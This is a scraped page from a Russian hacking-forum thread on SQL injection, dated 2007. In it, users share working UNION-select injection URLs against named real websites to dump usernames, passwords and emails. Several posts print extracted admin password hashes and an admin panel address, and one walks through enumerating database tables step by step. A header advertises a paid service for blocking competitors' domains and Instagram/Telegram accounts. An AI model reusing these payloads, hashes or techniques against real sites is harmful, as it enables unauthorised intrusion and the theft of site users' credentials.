УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 218 из 1242

218

Опции темы

Поиск в этой теме

Опции просмотра

#2171

08.05.2007, 06:50

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

www.dfalink.com

Код:

http://www.dfalink.com/group.php?id=-775+union+select+1,password,zip,4,5,email,id,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,24,24,25,26,27+from+members/*

лимит в помощь

www.trikhin.ru

Код:

http://www.trikhin.ru/index.php?rn_id=-39+union+select+1,2,3,4,5,6,7+admin/*

таблицa: user

www.e30club.ru

Код:

http://www.e30club.ru/index.php?id=-13+union+select+1,2,3,4,5,6,7+from+ds_e30club_page/*

#2172

08.05.2007, 18:29

Joker-jar

Постоянный

Регистрация: 11.03.2007

Сообщений: 581

Провел на форуме:
4172659

Репутация: 646

Отправить сообщение для Joker-jar с помощью ICQ

mr.The,

Код:

http://artbridge.ru/show_concurs.php?id=-1+union+select+1,2,3,concat(login,char(58),password,char(58),email,char(58)),5,6,7,8,9,10,11,12,13,14+from+users+limit+10/*

459 записей.

#2173

08.05.2007, 19:53

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

novdelo.ru

Код:

http://www.novdelo.ru/advertnews.php?id=-1+union+select+1,2,concat(login,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14+from+users/*

#2174

08.05.2007, 20:02

mr.The

Познавший АНТИЧАТ

Регистрация: 30.04.2007

Сообщений: 1,206

Провел на форуме:
4778940

Репутация: 1257

Отправить сообщение для mr.The с помощью ICQ

Joker-jar
ээээ у меня выдаёт

Цитата:

Database error in vCard Lite:
Invalid SQL: SELECT * FROM konkurses WHERE id=-1 union select 1,2,3,concat(login,char(58),passwor d,char(58),email,char(58)),5,6,7,8,9,10,11,12,13,1 4 from users limit 10/*
mysql error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'd,char(58),email,char(58)),5,6,7,8,9,10,11,12,13, 1 4 from user
mysql error number: 1064
Date: 2007/05/08 - 07:57:20 PM
Script: /show_concurs.php?id=-1+union+select+1,2,3,concat(login,char(58),passwor %20%20d,char(58),email,char(58)),5,6,7,8,9,10,11,1 2,13,1%20%204+from+users+limit+10/*
Referer:

#2175

08.05.2007, 23:31

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

Произведено обновление Антибояна. Незабываем проверять иньекции на предмет боянности
- http://hlamidnik.h18.ru/SQLS.html

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 09.05.2007 в 11:25..

#2176

09.05.2007, 00:11

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

\\скуль от меня\\

Код:

http://www.autohalle24.de/include/include.php?id=-019+union+select+char(1),concat_ws(0x3a,user(),version(),database()),null,null,null/*

__________________

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

#2177

09.05.2007, 01:11

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

Константин, готово

Цитата:

http://slil.ru/24347122

со 199 по эту.

#2178

09.05.2007, 11:34

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Выводит юзеров и пассы (в открытом виде). Так же мыла. Админа не нашёл, хотя особо не искал.

Цитата:

http://www.sota1.ru/week_news.php3?News_id=-17012+union+select+1,2,3,4,5,6,7,concat(login,0x3a ,password,0x3a,email),9+from+user+limit+1,1

Открыт доступ к таблицам user & users. (они идентичны). Закрыт доступ к таблицам mysql.user & mysql.users.
Админка: http://www.sota1.ru/phoneadmin
Форум: http://www.sota1.ru/phorum

К админке пассы выводимые из таблицы user конечно не подходят. Таблицы phorum.user & phpbb.user тоже закрыты.

__________________
..

#2179

09.05.2007, 11:52

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

Цитата:

Сообщение от [sL1p]

Открыт доступ к таблицам user & users. (они идентичны). Закрыт доступ к таблицам mysql.user & mysql.users.

Таблиц mysql.user & mysql.users просто - напросто не существует в этой базе данных

Цитата:

К админке пассы выводимые из таблицы user конечно не подходят. Таблицы phorum.user & phpbb.user тоже закрыты.

phorum.user & phpbb.user таких тоже не существует.

Код:

http://www.sota1.ru/week_news.php3?News_id=-17012+union+select+1,2,3,4,5,6,7,concat(username,char(58),user_password,char(58),user_icq),9+from+phpbb_users+limit+1,1/*

MobileServ:d79096188b670c2f81b7001f73801117
_________________________
добавление от Hawkins
MobileServ:d79096188b670c2f81b7001f73801117 - passw

Последний раз редактировалось _Pantera_; 11.05.2007 в 01:07..

sql-injections

#2180

09.05.2007, 12:49

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

sql-injections

Xage.ru (молодежный портал)

смотрим версию

Код:

http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,0,1,2,3,4/*

а она пятая. (вывод в строке поиска).
смотрим таблицы

Код:

http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+limit+252,1/*

так навскидку обращаем внимание на таблицы access, administrator, exp_members, user.
аналогично смотрим поля в таблицах

Код:

http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,0,1,2,3,4+from+exp_members+limit+0,1/*

в первых двух не нашел ничего интересного, в exp_members есть поля username,password,authcode,email
Admin:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

таблица user относится к форуму vB , и поля там соответственные.
1:Admin:f1e82a7d9d6f8a25019349e1982d4f24:W%L:admin@xage.ru

---------------------------------------------------------------------

Цитата:

Сообщение от Y.Dmitriy

Я в этом сильно не шарю но помоему скуль тут есть а там сами смотрите... если нет, то пусть модуры удалять...

http://smru.com.ua/globalnews.php?type=n&num=-1579+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5/*

----------------------------------------------------------------------

Y.Dmitriy, примеры погляди и все на свои места сразу встанет.

Цитата:

и есчооо

http://khomutynnik.info/view.php?type=list&status=0'&p=1'

http://khomutynnik.info/view.php?type=list&p=1&status=0+and+1=0+union+sele ct+1,2,3,concat_ws(0x3a,user(),version(),database( ))/*

Последний раз редактировалось _Pantera_; 11.05.2007 в 22:36..

Страница 218 из 1242

218

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход